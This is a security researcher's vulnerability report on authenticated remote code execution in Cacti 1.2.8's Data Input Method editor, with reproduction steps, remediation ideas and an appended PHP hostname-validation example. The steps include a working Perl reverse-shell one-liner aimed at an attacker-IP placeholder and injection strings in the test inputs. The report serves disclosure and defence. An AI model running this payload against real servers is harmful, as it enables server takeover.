Description
Describe the bug
Input validation error in data_input.php leads to Remote Code Execution via the Input String (Script/Command) edit action. By default, Cacti is installed with several Data Input Methods, some of which were created using the Script/Command input type. An attacker with permission to edit these methods is able to edit the Input String to insert malicious code and take control of the server.
Cacti version: Latest (1.2.8)
To Reproduce
Steps to reproduce the behavior:
- After logging in, navigate to Data Collection -> Data Input Methods -> Unix - Ping Host
- By default, the Input String is specified as:
  perl <path_cacti>/scripts/ping.pl <hostname>
  Let's prepend a malicious perl script to the current script:
  perl -e 'use Socket;$i="**ATTACKER-IP**";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'; perl <path_cacti>/scripts/ping.pl <hostname>
- By default, the Unix - Ping Host data input method is used by the Unix - Ping Latency graph template. This means we can create a Unix - Ping Latency graph on the current device and gain Remote Code Execution
Expected behavior
- By default, Ping Host works as a feature to check whether a host is up or down. With the malicious code prepended to the Input String, the server will first make a call back to the attacker's machine.
Impact
- The vulnerability lets an authorized user take control of the server. The attacker will then be able to take down the system as well as use the system for malicious purposes.
Screenshots
- Malicious code: https://imgur.com/icaFTHk
- Create new graph in device: https://imgur.com/C8zF3Py
- Reverse shell connection: https://imgur.com/97HgO0g
Desktop (please complete the following information):
- OS: Kali Linux, Ubuntu
- Browser : Firefox, Chrome
- Version: Firefox 72.0, Chrome 79.0.3945.117
Remediation
- I can think of two solutions:
1 - Use a regex to reject every string that differs from the expected input string
2 - Hard-code the perl script into the source code and force the application to accept only one filtered input (the hostname).
Chi Tran
research@ctrsec.io
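As an added illustration of the second remediation above (this is example code written for this report, not Cacti's own code), the command template is fixed in source and the only user-controlled value, the hostname, is validated against a strict pattern and shell-escaped before use. The constant CACTI_SCRIPT_DIR and the function names are assumptions for the example; the test inputs are constructed.

```php
<?php
// Added example, not Cacti's own code: a fixed command template that accepts
// only a validated hostname, so the script part can no longer be edited.
// CACTI_SCRIPT_DIR is a placeholder path, not a real Cacti configuration key.
const CACTI_SCRIPT_DIR = '/path/to/cacti/scripts';

/**
 * Accept only a plain hostname (RFC 1123 labels) or a dotted IPv4 address.
 * Quotes, semicolons, whitespace and other shell metacharacters all fail,
 * so the reverse-shell string from the report is rejected before it reaches
 * the shell at all.
 */
function is_valid_hostname(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return true;
    }
    // Each label: 1-63 alphanumerics or hyphens, no leading or trailing hyphen.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/^' . $label . '(?:\.' . $label . ')*$/', $host) === 1;
}

/**
 * Build the ping command from a hard-coded template. The interpreter and
 * script path are fixed; the hostname is validated and escaped. An invalid
 * hostname throws instead of being interpolated into the command line.
 */
function build_ping_command(string $host): string
{
    if (!is_valid_hostname($host)) {
        throw new InvalidArgumentException('Rejected hostname: ' . $host);
    }
    return 'perl ' . escapeshellarg(CACTI_SCRIPT_DIR . '/ping.pl')
         . ' ' . escapeshellarg($host);
}

// Constructed sample inputs: two legitimate hosts and two injection attempts.
$samples = [
    'router1.example.net',
    '10.0.0.5',
    "router1.example.net'; id; '",   // shell metacharacters: rejected
    'perl -e 1; 10.0.0.5',           // whitespace and a second command: rejected
];

foreach ($samples as $input) {
    try {
        echo build_ping_command($input), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), PHP_EOL;
    }
}
```

The same is_valid_hostname() check also serves the first remediation: applied to the stored Input String's variable fields on save, it rejects any value that is not a bare hostname or address, and the fixed template means there is no free-form command left for an operator to edit.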